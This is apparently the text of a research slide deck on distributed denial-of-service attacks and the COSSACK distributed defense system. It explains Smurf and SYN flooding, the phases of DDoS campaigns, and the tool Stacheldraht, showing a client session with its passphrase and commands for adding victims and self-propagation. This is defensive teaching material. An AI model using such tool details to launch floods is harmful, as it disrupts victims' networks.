2. Characterizing and Defending Against DDoS Attacks Christos Papadopoulos..and many others

3. How Do Computers Find Each Other? Internet Computer1Computer 2

4. What Are the Different Kinds of Addresses? •Have domain name (e.g., www.usc.edu) –Global, human readable name •DNS translates name to IP address (e.g. 128.125.19.146) –Global, understood by all networks • Finally, we need local net address –e.g., Ethernet (08-00-2c-19-dc-45) –Local, works only on a particular network

5. Domain Naming System (DNS) Local DNS server What’s the IP address for www.usc.edu? Computer 1 It is 128.125.19.146 DNS address manually configured into OS

6. Finding Ether Address: Address Resolution (ARP) Ethernet Broadcast: who knows the Ethernet address for 128.125.51.41? Ethernet Broadcast: I do, it is 08-00-2c-19-dc-45

7. Sending a Packet Through the Internet R R R R R HH H H H R R H R Routers send packet to next closest point H: Hosts R: Routers The Internet routes packets based on their destination!

8. Smurf Attack attacker target broadcast echo request source address is spoofed to be target’s address many echo replies are received by the target, since most machines on the amplifier network respond to the broadcast amplifier network

9. TCP SYN Flooding - A more powerful attack - client (port = 33623/tcp) server (port = 23/tcp) SYN SYN - ACK ACK [session proceeds] [ACK set for remainder of session] target (port = 23/tcp) SPOOFED SYN SYN - ACK FINAL ACK NEVER SENT nonexistent host

10. So, What Is DDoS? Distributed Denial of Service  New, more pernicious type of attack  Many hosts “gang” up to attack another host  Network resource attack:  Bandwidth  State

11. Why Should We Care?  Successfully used to attack prominent sites in the Internet by those with a primitive understanding of internet protocols  It is relatively easy to do, but hard to detect and stop  It is only going to get worse unless we develop adequate protection mechanisms

12. Anatomy of an Attack  Compromise a large set of machines  Install attack tools  Instruct all attack machines to initiate attack against a victim Process highly automated

13. Phase 1: Compromise A (stolen) account is used as repository for attack tools. A scan is performed to identify potential victims. A script is used to compromise the victims.

14. Phase 2: Install Attack Tools An automated installation script is then run on the “ owned ” systems to download and install the attack tool(s) from the repository. Optionally, a “ root kit ” is installed on the compromised systems.

15. Phase 3: Launch attack Launch a coordinated DDoS from different sites against a single victim. Network pipes of attackers can be small, but aggregated bw is far larger than victim’s pipe. Victim’s ISP may not notice elevated traffic. DDoS attacks are harder to track than a DoS.

17. Some Known DDoS attack tools  Trin00  Tribal Flood Network (TFN)  Tribal Flood Network 2000 (TFN2K)  Stacheldraht

18.  Combines features of trin00 and TFN.  Adds encryption between the attacker and masters and automated update of agents.  Communication between attacker and masters take place on tcp port 16660.  Daemons receive commands from masters through ICMP echo replies  ICMP, UDP, SYN flood and SMURF attack. Stacheldraht

19. #./ client 192.168.0.1 [*] stacheldraht [*] (c) in 1999 by... trying to connect... connection established. -------------------------------------- enter the passphrase : sicken -------------------------------------- entering interactive session. ****************************** welcome to stacheldraht ****************************** type.help if you are lame stacheldraht( status: a!1 d!0)>

20. stacheldraht(status: a!1 d!0)>.help available commands in this version are: --------------------------------------------------.mtimer.mudp.micmp.msyn.msort.mping.madd.mlist.msadd.msrem.distro.help.setusize.setisize.mdie.sprange.mstop.killall.showdead.showalive -------------------------------------------------- stacheldraht(status: a!1 d!0)>

21. Some Commands --------.distro user server Instructs the agent to install and run a new copy of itself using the Berkeley "rcp" command, on the system "server", using the account "user" (e.g., "rcp user@server:linux.bin ttymon").madd ip1[:ip2[:ipN]] Add IP addresses to list of attack victims..madd ip1[:ip2[:ipN]] Add IP addresses to list of attack victims..mdie Sends die request to all agents.

22. COSSACK: Coordinated Suppression of Simultaneous Attacks Computer Networks Division ISI http://www.isi.edu/cossack

23. People  Co-PIs: Christos Papadopoulos, Bob Lindell (USC/ISI)  Affiliations: Ramesh Govindan (USC/ISI)  Staff: John Mehringer (ISI)  Students: Alefiya Hussain (USC)  DARPA synergies:  DWARD - Peter Reiher, Jelena Mirkovic (UCLA)  SAMAN - John Heidemann (USC/ISI)

24. Cossack Overview  Distributed set of watchdogs at network perimeter  Local IDS  Group communication  Topology information (when available)  Fully distributed approach  Peer-to-peer rather than master-slave  Attack-driven dynamic grouping of watchdogs  Attack correlation via coordination with other watchdogs  Independent, selective deployment of countermeasures

25. Cossack: A Simplified View WW W target watchdog attacker watchdog

26. Attacks Begin WW W target watchdog attacker

27. Watchdogs Communicate Using YOID WW W target watchdog attacker YOID

28. Attacks Detected WW W target watchdog attacker YOID

29. Watchdogs Install Filters and Eliminate Attack WW W target watchdog attacker

30. Detecting Source Spoofed Attacks WW W target watchdog attacker YOID

31. Cossack Watchdog Architecture Yoid Multicast Interface Distributed Blackboard Snort Interface Rate Monitor Other IDS (D-WARD) Router Control Pulsing Detector Cisco Interface Linux IPTables Router Interface Event Monitor YOID Multicast group

32. Cossack Plugin Operation Packet Flow Statistics Packet Averages Grouped by Destination Address Yoid Multicast Interface Distributed Blackboard Snort Interface Rate Monitor Other IDS (D-WARD) Router Control Pulsing Detector Cisco Interface Linux IPTables Router Interface Event Monitor Request more stats

33. Cossack Plugin Operation Packet Flow Statistics Packet Averages Grouped by Destination Address Yoid Multicast Interface Distributed Blackboard Snort Interface Rate Monitor Other IDS (D-WARD) Router Control Pulsing Detector Cisco Interface Linux IPTables Router Interface Event Monitor Request for more stats Packet Averages Grouped by Source Address

34. Cossack Network Inspector Tool to determine detection thresholds for watchdogs •Interfaces with the Cossack Snort Plugin •Collects aggregate level network traffic statistics –Traffic filters created using snort rules

35. Cossack Performance •Response time: 5 – 30 seconds •Insensitive to attack type

36. Attack Capture and Analysis Goal: Capture some attacks, analyze and learn from them •Packet-level capture facilities in several sites: –Los Nettos –USC –CAIDA –[Telcordia, Sprint] •Spectral analysis

37. LA-MAE VerioCogent Genuity Los Nettos Trace Machine 140Mbps,38kpps JPL Caltech TRWUSC Centergate Tracing Infrastructure Internet Los Nettos Customers

38. •Captured and classified about 120 attacks over several months Attack ClassCountPPSKbps Single-source37133-1360640-2260 Multi-source1016000- 98000 13000- 46000 Reflected201300-37001700-3000 Unclassified13550-335001600-16000 Captured Attacks

39. Spectral Attack Analysis Multi-source attack (145 sources) Localization of power in low frequencies in NCS Single-source attack Strong higher frequencies and linear Normalized Cumulative Spectrum (NCS) F(60%)

40. Spectral Analysis Goal: identify single vs. multi-source attacks Single-source: F(60%) mean 268Hz (240- 295Hz) Multi-source: F(60%) mean 172Hz (142- 210Hz) Able to robustly categorize unclassified attacks

41. Conclusions  Cossack is a fully distributed approach against DDoS attacks  Software is operational and currently undergoing Red Team testing  We continue to capture attacks, analyze and learn from them  Spectral analysis work very promising http://www.isi.edu/cossack